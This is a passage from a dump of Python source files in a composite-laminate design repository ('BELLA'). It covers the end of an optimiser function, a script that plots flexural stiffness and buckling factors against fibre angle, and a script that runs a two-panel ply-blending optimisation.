mp=True)\r\n else:\r\n penalty_10 = calc_penalty_10_pc(n_plies_per_angle, constraints)\r\n\r\n # balance\r\n penalty_bal_ipo = np.zeros((multipanel.reduced.n_panels,))\r\n\r\n# print()\r\n# print_ss(ss[2])\r\n# print('obj_no_constraints', obj_no_constraints)\r\n# print(penalty_diso)\r\n# print(penalty_contig)\r\n# print(penalty_bal_ipo)\r\n# print(penalty_10)\r\n\r\n obj_constraints_test = calc_obj_multi_panel(\r\n objective=obj_no_constraints,\r\n actual_panel_weightings=multipanel.reduced.actual_panel_weightings,\r\n penalty_diso=penalty_diso,\r\n penalty_contig=penalty_contig,\r\n penalty_10=penalty_10,\r\n penalty_bal_ipo=penalty_bal_ipo,\r\n coeff_diso=obj_func_param.coeff_diso,\r\n coeff_contig=obj_func_param.coeff_contig,\r\n coeff_10=obj_func_param.coeff_10,\r\n coeff_bal_ipo=obj_func_param.coeff_bal_ipo)\r\n\r\n if abs(obj_constraints_test - obj_constraints > 1e-10).any():\r\n print('obj_constraints_test', obj_constraints_test)\r\n print('obj_constraints', obj_constraints)\r\n pass\r\n raise Exception(\"\"\"\r\nObjective function value not matching the stacking sequences.\"\"\")\r\n\r\n\r\n ### calculates penalties for all panels\r\n\r\n # theses penalties are not used in caculations, just used to show the\r\n # degrees of feasibility of the designed laminates in the result report\r\n\r\n # balance\r\n penalty_bal_ipo = calc_penalty_ipo(lampam)\r\n\r\n # out-of-plane orthotropy\r\n penalty_oopo = calc_penalty_oopo_ss(lampam, constraints=constraints)\r\n\r\n # penalty_spacing\r\n penalty_spacing = calc_penalty_spacing(\r\n pdl=pdl_final[index],\r\n multipanel=multipanel,\r\n constraints=constraints,\r\n on_blending_strip=True)\r\n\r\n# =============================================================================\r\n# return the results\r\n# =============================================================================\r\n results.ss = extend_after_guide_based_blending(multipanel, ss)\r\n results.lampam = extend_after_guide_based_blending(multipanel, lampam)\r\n results.n_plies_per_angle = extend_after_guide_based_blending(\r\n multipanel, n_plies_per_angle)\r\n results.n_obj_func_calls = n_obj_func_calls\r\n results.obj_constraints = obj_constraints\r\n results.obj_no_constraints = 
extend_after_guide_based_blending(\r\n multipanel, obj_no_constraints)\r\n results.penalty_diso = extend_after_guide_based_blending(\r\n multipanel, penalty_diso)\r\n results.penalty_contig = extend_after_guide_based_blending(\r\n multipanel, penalty_contig)\r\n results.penalty_10 = extend_after_guide_based_blending(\r\n multipanel, penalty_10)\r\n results.penalty_bal_ipo = extend_after_guide_based_blending(\r\n multipanel, penalty_bal_ipo)\r\n results.penalty_oopo = extend_after_guide_based_blending(\r\n multipanel, penalty_oopo)\r\n results.penalty_spacing = penalty_spacing\r\n results.n_diso = extend_after_guide_based_blending(multipanel, n_diso)\r\n results.n_contig = extend_after_guide_based_blending(multipanel, n_contig)\r\n results.sst = extend_after_guide_based_blending(\r\n multipanel, sst_final[index])\r\n results.pdl = extend_after_guide_based_blending(\r\n multipanel, pdl_final[index])\r\n return results\r\n"
},
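The optimiser record above prunes its beam-search tree in two passes (local, then global) by repeatedly locating the worst candidate with np.argmax/np.argmin and overwriting it with a sentinel value. A minimal sketch of the same keep-the-best-K pruning idea, assuming a plain array of objective values; the function name and inputs here are illustrative, not part of BELLA's API:

    :::python
    import numpy as np

    def prune_nodes(objectives, node_limit):
        # Keep the indices of the node_limit smallest objective values.
        # One argsort replaces the repeated argmin/sentinel bookkeeping.
        objectives = np.asarray(objectives, dtype=float)
        if objectives.size <= node_limit:
            return np.arange(objectives.size)
        return np.argsort(objectives)[:node_limit]

    # usage: keep the 3 best of 5 candidate nodes
    keep = prune_nodes([0.4, 0.1, 0.9, 0.2, 0.7], node_limit=3)
    print(keep)  # [1 3 0]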
{
"alpha_fraction": 0.5174461603164673,
"alphanum_fraction": 0.5755382180213928,
"avg_line_length": 30.263473510742188,
"blob_id": "8d470ee9922a793e2bb874f633b60ca676e682bc",
"content_id": "a2cace82fa44eacb66f21b0c831dcebb3a7bd5e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5388,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 167,
"path": "/src/divers/plot_for_CDT_presentation.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nscipt to prepare plots for CDT presentation\r\nApril 2019\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nsys.path.append(r'C:\\BELLA')\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.ticker as ticker\r\n\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.CLA.ABD import D_from_lampam\r\nfrom src.BELLA.materials import Material\r\nfrom src.buckling.buckling import buckling_factor\r\n\r\n#==============================================================================\r\n# Material properties\r\n#==============================================================================\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mmm\r\n\r\nmat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n density_area=density_area, ply_t=ply_t)\r\n#==============================================================================\r\n# Stacking sequences\r\n#==============================================================================\r\nn_values = 100\r\n\r\ntheta = np.linspace(-90, 90, n_values, endpoint=True)\r\n\r\nlampam = np.zeros((n_values, 12), float)\r\nD11 = np.zeros((n_values,), float)\r\nD22 = np.zeros((n_values,), float)\r\nD12 = np.zeros((n_values,), float)\r\nD66 = np.zeros((n_values,), float)\r\nbuck = np.zeros((n_values,), float)\r\n\r\nfor index in range(n_values):\r\n ss = np.zeros((1,), float)\r\n ss[0] = theta[index]\r\n lampam[index] = calc_lampam(ss)\r\n D = D_from_lampam(lampam[index], mat)\r\n D11[index] = D[0, 0]\r\n D22[index] = D[1, 1]\r\n D12[index] = D[0, 1]\r\n D66[index] = D[2, 2]\r\n buck[index] = buckling_factor(lampam[index],\r\n mat,\r\n n_plies = 1,\r\n N_x= 10,\r\n N_y= 10,\r\n length_x=0.1,\r\n length_y=0.1)\r\n\r\nfig, ax = plt.subplots(1,1, sharex=True, figsize=(8,5.8))\r\n# sharex=True to align x-axes of the graphs\r\n# figsize size of the combines sub-plots\r\nmy_labelsize = 20\r\nmy_titlesize = 40\r\nmy_axissize = 26\r\nmy_font = 'Arial'\r\n# color of line of the graphs, boxes\r\nax.spines['bottom'].set_color('black')\r\nax.spines['top'].set_color('white')\r\nax.spines['right'].set_color('white')\r\nax.spines['left'].set_color('black')\r\n# set the ticks\r\nax.tick_params(\r\n direction='out',\r\n length = 0, width = 4,\r\n colors = 'black',\r\n labelsize = my_labelsize)\r\nax.yaxis.set_ticks([0,00, 0.04, 0.08])\r\n# plot\r\nax.plot(theta, D11, 'b-')\r\n# set axes' labels\r\nax.set_ylabel(\r\n r'$\\mathrm{Flexural\\ stiffnesses\\ [Pa.m^{-3}]}$',\r\n fontweight=\"normal\",\r\n fontsize = my_axissize,\r\n fontname=my_font)\r\nax.plot(theta, D22, 'g-')\r\nax.yaxis.set_ticks([0,00, 0.04, 0.08])\r\nax.plot(theta, D12 + 2*D66, 'r-')\r\nax.set_xlabel(\r\n r'$\\mathrm{Fibre\\ orientation\\ \\theta\\ [^{\\circ}]}$',\r\n fontsize =my_axissize,\r\n fontname=my_font)\r\nax.yaxis.set_ticks([0,00, 0.02, 0.04, 0.06, 0.08])\r\nax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%1.0f'))\r\nax.xaxis.set_ticks([-90, -75,-60, -45, -30, -15, 0, 15, 30, 45, 60, 75, 90])\r\n# format labels\r\nax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%1.2f'))\r\n# white 
background\r\nax.set_facecolor((1, 1, 1))\r\n# labels fonts\r\nlabels = ax.get_xticklabels() + ax.get_yticklabels()\r\n[label.set_fontname(my_font) for label in labels]\r\n# axes' ranges\r\nax.set_xlim([-90, 90]) #ax.set_ylim([-1, 1])\r\n# grid\r\nax.grid(False)\r\n# automatic aspect ratio\r\nax.set_aspect('auto')\r\n# padding when several subplots\r\nplt.tight_layout(pad=1, w_pad=1, h_pad=3)\r\n# legends\r\nax.legend((r'$\\mathrm{D_{11}}$',\r\n           r'$\\mathrm{D_{22}}$',\r\n           r'$\\mathrm{D_{12} + 2*D_{66}}$'),\r\n          handletextpad=0,\r\n          loc='right',\r\n          fontsize =my_labelsize)\r\n# padding for the labels\r\nax.tick_params(pad = 10)\r\n#plt.tight_layout(pad=20, w_pad=20, h_pad=20)\r\n# save image\r\nplt.savefig('plot_Ds.svg')\r\n\r\nfig, ax = plt.subplots(1,1, sharex=True, figsize=(9,3))\r\nmy_labelsize = 20\r\nmy_titlesize = 40\r\nmy_axissize = 26\r\nmy_font = 'Arial'\r\nax.spines['bottom'].set_color('black')\r\nax.spines['top'].set_color('white')\r\nax.spines['right'].set_color('white')\r\nax.spines['left'].set_color('black')\r\nax.tick_params(direction='out',\r\n               length = 0, width = 4,\r\n               colors = 'black', labelsize = my_labelsize,\r\n               pad = 10)\r\nax.plot(theta, buck)\r\nax.set_xlabel(\r\n    r'$\\mathrm{\\theta}$',\r\n    fontsize =my_axissize,\r\n    fontname=my_font) # X label\r\nax.set_ylabel(\r\n    r'$\\mathrm{Buckling\\ factors}$', fontweight=\"normal\",\r\n    fontsize = my_axissize,\r\n    fontname=my_font) # Y label\r\nax.yaxis.set_ticks([4, 5, 6, 7, 8, 9])\r\nax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%1.0f'))\r\nax.xaxis.set_ticks([-90, -75,-60, -45, -30, -15, 0, 15, 30, 45, 60, 75, 90])\r\nax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%1.0f'))\r\nax.set_facecolor((1, 1, 1))\r\nlabels = ax.get_xticklabels() + ax.get_yticklabels()\r\n[label.set_fontname(my_font) for label in labels]\r\nax.set_xlim([-90, 90])\r\nax.grid(False)\r\nplt.savefig('plot_buck.svg')\r\n"
},
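The plotting record above sweeps the fibre orientation from -90 to 90 degrees and plots flexural stiffnesses and buckling factors against it. A self-contained sketch of that sweep-and-plot pattern; the cos⁴ term is a placeholder property, not the repo's D_from_lampam or buckling_factor computation:

    :::python
    import numpy as np
    import matplotlib.pyplot as plt

    theta = np.linspace(-90, 90, 100)           # fibre orientations in degrees
    stiffness = np.cos(np.radians(theta)) ** 4  # placeholder for D11(theta)

    fig, ax = plt.subplots(figsize=(8, 5))
    ax.plot(theta, stiffness, 'b-')
    ax.set_xlabel('Fibre orientation [deg]')
    ax.set_ylabel('Normalised stiffness [-]')
    ax.set_xticks(np.arange(-90, 91, 15))       # same tick layout as the script
    fig.tight_layout()
    fig.savefig('sweep.svg')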
{
"alpha_fraction": 0.6198435425758362,
"alphanum_fraction": 0.6578947305679321,
"avg_line_length": 33.82590103149414,
"blob_id": "74ad399f44d70a648934f8188be031bbb4b2706f",
"content_id": "46d42464713955a7e6f9991245dabaf24661fe80",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16872,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 471,
"path": "/run_BELLA_2_panels.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nScript to retrieve a blended multi-panel layout based on:\r\n - a panel thickness distribution\r\n - set of lamination parameter targets for each panel\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport time\r\nimport numpy as np\r\nimport random\r\n\r\nrandom.seed(10)\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.obj_function import ObjFunction\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.optimiser import BELLA_optimiser\r\nfrom src.BELLA.format_pdl import convert_sst_to_ss\r\nfrom src.CLA.lampam_functions import calc_lampam_2\r\nfrom src.divers.excel import delete_file\r\nfrom src.divers.pretty_print import print_list_ss\r\n\r\nfilename = 'BELLA-2-panels-test.xlsx'\r\n\r\n# check for authorisation before overwriting\r\ndelete_file(filename)\r\n\r\nconstraints_set = 'C0'\r\nconstraints_set = 'C1'\r\n\r\n### Targets and panel geometries ----------------------------------------------\r\n\r\n# panel IDs\r\nID = [1, 2]\r\n\r\n# number of panels\r\nn_panels = len(ID)\r\n\r\n# panels adjacency\r\nneighbour_panels = {1:[2], 2:[1]}\r\n\r\n# boundary weights\r\nboundary_weights = {(1, 2) : 1}\r\n\r\n# panel length in the x-direction\r\nlength_x = [1] *n_panels\r\n\r\n# panel length in the y-direction\r\nlength_y = [1] *n_panels\r\n\r\n# panel loading per unit width in the x-direction\r\nN_x = [1] *n_panels\r\n\r\n# panel loading per unit width in the y-direction\r\nN_y = [1] *n_panels\r\n\r\n# panel target stacking sequences\r\nsst_target = np.array([\r\n 45, 0, -45, 0, 0, 45, 0, 0, 45, 90, 90, -45, -45, 0, ], dtype=int)\r\nsst_target = np.array([\r\n 0, 0, 0, 0, 0, 0, 0, 0, ], dtype=int)\r\nsst_target = np.hstack((sst_target, np.flip(sst_target)))\r\nsst_target = np.vstack((sst_target, np.copy(sst_target), np.copy(sst_target)))\r\nsst_target[1:, 3] = -1\r\nsst_target[1:, 6] = -1\r\n# sst_target[1:, 9] = -1\r\nsst_target[1:, -4] = -1\r\nsst_target[1:, -7] = -1\r\n# sst_target[1:, -10] = -1\r\n# sst_target[2:, 4] = -1\r\n# sst_target[2:, 10] = -1\r\n# sst_target[2:, -5] = -1\r\n# sst_target[2:, -11] = -1\r\n\r\nss_target = convert_sst_to_ss(sst_target)\r\n\r\n# panel number of plies\r\nn_plies = [stack.size for stack in ss_target]\r\n\r\n# panel amination parameters targets\r\nlampam_targets = [\r\n calc_lampam_2(ss_target[ind_panel]) for ind_panel in range(n_panels)]\r\n\r\n### Design guidelines ---------------------------------------------------------\r\n\r\n# constraints_set == 'C0' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering rule enforced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced, no other lay-up rules\r\n#\r\n# constraints_set == 'C1' ->\r\n# - ply-drop spacing rule enforced with a minimum of\r\n# constraints.min_drop plies between ply drops at panel boundaries\r\n# - covering enforrced by preventing the drop of the\r\n# constraints.n_covering outermost plies on each laminate surface\r\n# - symmetry rule enforced\r\n# - 10% rule enforced\r\n# if rule_10_Abdalla == True rule applied by restricting LPs instead of\r\n# ply percentages and percent_Abdalla is the percentage limit of the\r\n# rule\r\n# otherwise:\r\n# if 
combine_45_135 == True the restrictions are:\r\n#                 - a maximum percentage of constraints.percent_0 0 deg plies\r\n#                 - a maximum percentage of constraints.percent_90 90 deg plies\r\n#                 - a maximum percentage of constraints.percent_45_135 +-45 deg plies\r\n#             if combine_45_135 == False the restrictions are:\r\n#                 - a maximum percentage of constraints.percent_0 0 deg plies\r\n#                 - a maximum percentage of constraints.percent_90 90 deg plies\r\n#                 - a maximum percentage of constraints.percent_45 45 deg plies\r\n#                 - a maximum percentage of constraints.percent_135 -45 deg plies\r\n#     - disorientation rule enforced with variation of fibre angle between\r\n#     adjacent plies limited to a maximum value of constraints.delta_angle\r\n#     degrees\r\n#     - contiguity rule enforced with no more than constraints.n_contig\r\n#     adjacent plies with same fibre angle\r\n#     - damage tolerance rule enforced\r\n#         if constraints.dam_tol_rule == 1 the restrictions are:\r\n#             - one outer ply at + or -45 deg at the laminate surfaces\r\n#             (2 plies in total)\r\n#         if constraints.dam_tol_rule == 2 the restrictions are:\r\n#             - [+45, -45] or [-45, +45] at the laminate surfaces\r\n#             (4 plies in total)\r\n#         if constraints.dam_tol_rule == 3 the restrictions are:\r\n#             - [+45,-45] [-45,+45] [+45,+45] or [-45,-45] at the laminate\r\n#             surfaces (4 plies in total)\r\n#     - out-of-plane orthotropy rule enforced to have small absolute values\r\n#     of LP_11 and LP_12 such that the values of D16 and D26 are small too\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = np.array([-45, 0, 45, 90], dtype=int)\r\n#set_of_angles = np.array([-45, 0, 45, 90, +30, -30, +60, -60], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n    bal = False # balance rule\r\n    rule_10_percent = False # 10% rule\r\n    diso = False # disorientation rule\r\n    contig = False # contiguity rule\r\n    dam_tol = False # damage-tolerance rule\r\nelse:\r\n    bal = True\r\n    rule_10_percent = True\r\n    diso = True\r\n    contig = True\r\n    dam_tol = True\r\n\r\nrule_10_Abdalla = False # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 0 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 = 10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n    sym=sym,\r\n    bal=bal,\r\n    oopo=oopo,\r\n    dam_tol=dam_tol,\r\n    dam_tol_rule=dam_tol_rule,\r\n    covering=covering,\r\n    n_covering=n_covering,\r\n    rule_10_percent=rule_10_percent,\r\n    rule_10_Abdalla=rule_10_Abdalla,\r\n    percent_Abdalla=percent_Abdalla,\r\n    percent_0=percent_0,\r\n    percent_45=percent_45,\r\n    percent_90=percent_90,\r\n    
percent_135=percent_135,\r\n    percent_45_135=percent_45_135,\r\n    combine_45_135=combine_45_135,\r\n    diso=diso,\r\n    contig=contig,\r\n    n_contig=n_contig,\r\n    delta_angle=delta_angle,\r\n    set_of_angles=set_of_angles,\r\n    min_drop=min_drop,\r\n    pdl_spacing=pdl_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mm\r\n\r\nmat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n               density_area=density_area, ply_t=ply_t)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\noptimisation_type = 'AD'\r\nif optimisation_type == 'A':\r\n    if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n        lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])\r\n    else:\r\n        lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])\r\nelif optimisation_type == 'D':\r\n    if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n        lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n    else:\r\n        lampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])\r\nelif optimisation_type == 'AD':\r\n    if all(elem in {0, +45, -45, 90} for elem in constraints.set_of_angles):\r\n        lampam_weightings = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])\r\n    else:\r\n        lampam_weightings = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])\r\n\r\n# Weightings of the panels in the multi-panel objective function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\nobj_func_param = ObjFunction(\r\n    constraints=constraints,\r\n    coeff_contig=coeff_contig,\r\n    coeff_diso=coeff_diso,\r\n    coeff_10=coeff_10,\r\n    coeff_oopo=coeff_oopo,\r\n    coeff_spacing=coeff_spacing)\r\n\r\n### Optimiser ----------------------------------------------------------------\r\n\r\n## For step 2 of BELLA\r\n\r\n# Number of initial ply drops to be tested\r\nn_ini_ply_drops = 1\r\n# Minimum ply count for ply groups during ply drop layout generation\r\ngroup_size_min = 4\r\n# Desired ply count for ply groups during ply drop layout generation\r\ngroup_size_max = 12\r\n# Time limit to create a group ply-drop layout\r\ntime_limit_group_pdl = 1\r\n# Time limit to create a ply-drop layout\r\ntime_limit_all_pdls = 10\r\n\r\n## For step 3 of BELLA\r\n\r\n# Branching limit for global pruning\r\nglobal_node_limit = 3\r\n# Branching limit for local pruning\r\nlocal_node_limit = 3\r\n# Branching limit for global pruning at the last level\r\nglobal_node_limit_final = 1\r\n# Branching limit for local pruning at the last level\r\nlocal_node_limit_final = 1\r\n\r\n## For step 4.1 of 
BELLA\r\n\r\n# to save repair success rates\r\nsave_success_rate = True\r\n# Thickness of the reference panels\r\nn_plies_ref_panel = 1\r\n# repair to improve the convergence towards the in-plane lamination parameter\r\n# targets\r\nrepair_membrane_switch = False\r\n# repair to improve the convergence towards the out-of-plane lamination\r\n# parameter targets\r\nrepair_flexural_switch = False\r\n# percentage of laminate thickness for plies that can be modified during\r\n# the refinement of membrane properties\r\np_A = 80\r\n# number of plies in the last permutation during repair for disorientation\r\n# and/or contiguity\r\nn_D1 = 6\r\n# number of ply shifts tested at each step of the re-designing process during\r\n# refinement of flexural properties\r\nn_D2 = 10\r\n# number of times the algorithms 1 and 2 are repeated during the flexural\r\n# property refinement\r\nn_D3 = 2\r\n\r\n## For step 4.2 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit2 = 1\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit2 = 1\r\n\r\n## For step 4.3 of BELLA\r\n\r\n# Branching limit for global pruning during ply drop layout optimisation\r\nglobal_node_limit3 = 1\r\n# Branching limit for local pruning during ply drop layout optimisation\r\nlocal_node_limit3 = 1\r\n\r\nparameters = Parameters(\r\n constraints=constraints,\r\n group_size_min=group_size_min,\r\n group_size_max=group_size_max,\r\n n_ini_ply_drops=n_ini_ply_drops,\r\n global_node_limit=global_node_limit,\r\n global_node_limit_final=global_node_limit_final,\r\n local_node_limit=local_node_limit,\r\n local_node_limit_final=local_node_limit_final,\r\n global_node_limit2=global_node_limit2,\r\n local_node_limit2=local_node_limit2,\r\n global_node_limit3=global_node_limit3,\r\n local_node_limit3=local_node_limit3,\r\n save_success_rate=save_success_rate,\r\n p_A=p_A,\r\n n_D1=n_D1,\r\n n_D2=n_D2,\r\n n_D3=n_D3,\r\n repair_membrane_switch=repair_membrane_switch,\r\n repair_flexural_switch=repair_flexural_switch,\r\n n_plies_ref_panel=n_plies_ref_panel,\r\n time_limit_group_pdl=time_limit_group_pdl,\r\n time_limit_all_pdls=time_limit_all_pdls)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=lampam_targets[ind_panel],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=n_plies[ind_panel],\r\n length_x=length_x[ind_panel],\r\n length_y=length_y[ind_panel],\r\n N_x=N_x[ind_panel],\r\n N_y=N_y[ind_panel],\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\n\r\nmultipanel = MultiPanel(panels, boundary_weights)\r\n\r\n### Optimiser Run -------------------------------------------------------------\r\n\r\nt = time.time()\r\nresult = BELLA_optimiser(multipanel, parameters, obj_func_param, constraints,\r\n filename, mat)\r\nelapsed = time.time() - t\r\n\r\n### Display results -----------------------------------------------------------\r\n\r\n# solution stacking sequences (list of arrays)\r\nss = result.ss\r\n# solution stacking sequence table (array)\r\nsst = result.sst\r\n# solution lamination parameters (array)\r\nlampam = result.lampam\r\n# objective function value of the solution with constraint\r\n# penalties\r\nobj_constraints = result.obj_constraints\r\n# objective function value of the solution with no constraint\r\n# 
penalties\r\nobj_no_constraints = result.obj_no_constraints\r\n# objective function values with no constraint\r\n#penalties\r\nobj_no_constraints_tab = result.obj_no_constraints_tab\r\n# objective function values with constraint\r\n# penalties\r\nobj_constraints_tab = result.obj_constraints_tab\r\n# number of calls of the objective functions\r\nn_obj_func_calls_tab = result.n_obj_func_calls_tab\r\n# penalty for the disorientation constraint\r\npenalty_diso_tab = result.penalty_diso_tab\r\n# penalty for the contiguity constraint\r\npenalty_contig_tab = result.penalty_contig_tab\r\n# penalty for the 10% rule\r\npenalty_10_tab = result.penalty_10_tab\r\n# penalty for in-plane orthotropy\r\npenalty_bal_ipo_tab = result.penalty_bal_ipo_tab\r\n# penalty for out-of-plane orthotropy\r\npenalty_oopo_tab = result.penalty_oopo_tab\r\n# index for the outer loop with the best design\r\nind_mini = result.ind_mini\r\n# number of plies in each fibre direction for each panel\r\nn_plies_per_angle = result.n_plies_per_angle\r\n\r\nprint(r'\\\\\\\\\\\\\\ Final objective : ', obj_constraints)\r\nprint(r'\\\\\\\\\\\\\\ Elapsed time : ', elapsed, 's')\r\nprint(r'\\\\\\\\\\\\\\ objectives: ', obj_constraints_tab)\r\nprint(r'\\\\\\\\\\\\\\ Number of function evaluations')\r\nprint(n_obj_func_calls_tab)\r\nif constraints.rule_10_percent:\r\n print(r'\\\\\\\\\\\\\\ Penalties for the 10% rule')\r\n print(penalty_10_tab)\r\nif constraints.diso:\r\n print(r'\\\\\\\\\\\\\\ Penalties for disorientation')\r\n print(penalty_diso_tab)\r\nif constraints.contig:\r\n print(r'\\\\\\\\\\\\\\ Penalties for contiguity')\r\n print(penalty_contig_tab)\r\nif constraints.ipo:\r\n print(r'\\\\\\\\\\\\\\ Penalties for in-plane-orthotropy')\r\n print(penalty_bal_ipo_tab)\r\nif constraints.oopo:\r\n print(r'\\\\\\\\\\\\\\ Penalties for out-of-plane-orthotropy')\r\n print(penalty_oopo_tab)\r\n\r\nprint('\\nRetrieved stacking sequences')\r\n# for ii, panel in enumerate(multipanel.panels):\r\n# print('panel', ii + 1)\r\n# print_ss(ss[ii])\r\n\r\n#print('lampam_Retrieved VS lampam_target & difference')\r\n#for ii, panel in enumerate(multipanel.panels):\r\n# print('panel', ii + 1)\r\n# print_lampam(lampam[ii], panel.lampam_target, diff=True)\r\n\r\n#for index, panel in enumerate(multipanel.panels):\r\n# print('panel', index + 1)\r\n# N15plus = sum(ss[index] == 15)\r\n# N15minus = sum(ss[index] == -15)\r\n# N30plus = sum(ss[index] == 30)\r\n# N30minus = sum(ss[index] == -30)\r\n# N45plus = sum(ss[index] == 45)\r\n# N45minus = sum(ss[index] == -45)\r\n# N60plus = sum(ss[index] == 60)\r\n# N60minus = sum(ss[index] == -60)\r\n# N75plus = sum(ss[index] == 15)\r\n# N75minus = sum(ss[index] == -15)\r\n # balance check\r\n# if N15plus != N15minus \\\r\n# or N30plus != N30minus \\\r\n# or N45plus != N45minus \\\r\n# or N60plus != N60minus \\\r\n# or N75plus != N75minus:\r\n# if N45plus != N45minus:\r\n# print('balance constraint not respected:')\r\n# print(f'N45 - N-45: {N45plus - N45minus}')\r\n\r\nprint_list_ss(ss)"
},
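The run script above builds a symmetric target stacking-sequence table and marks dropped plies with -1 before handing it to convert_sst_to_ss. A minimal sketch of that table construction; the angles and drop positions below are arbitrary illustration values, not the script's targets:

    :::python
    import numpy as np

    half = np.array([45, 0, -45, 90], dtype=int)  # half-stack of the guide panel
    guide = np.hstack((half, np.flip(half)))      # symmetric guide laminate
    sst = np.vstack((guide, np.copy(guide)))      # one row per panel
    sst[1, [1, -2]] = -1                          # drop a symmetric pair in panel 2
    print(sst)
    # [[ 45   0 -45  90  90 -45   0  45]
    #  [ 45  -1 -45  90  90 -45  -1  45]]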
{
"alpha_fraction": 0.5576273202896118,
"alphanum_fraction": 0.5659433603286743,
"avg_line_length": 38.404197692871094,
"blob_id": "3718d1db222749e5fb43b334b73519fcb1abbea0",
"content_id": "0ba76b48f59fec9b86baa7c9ef482731c6587be4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
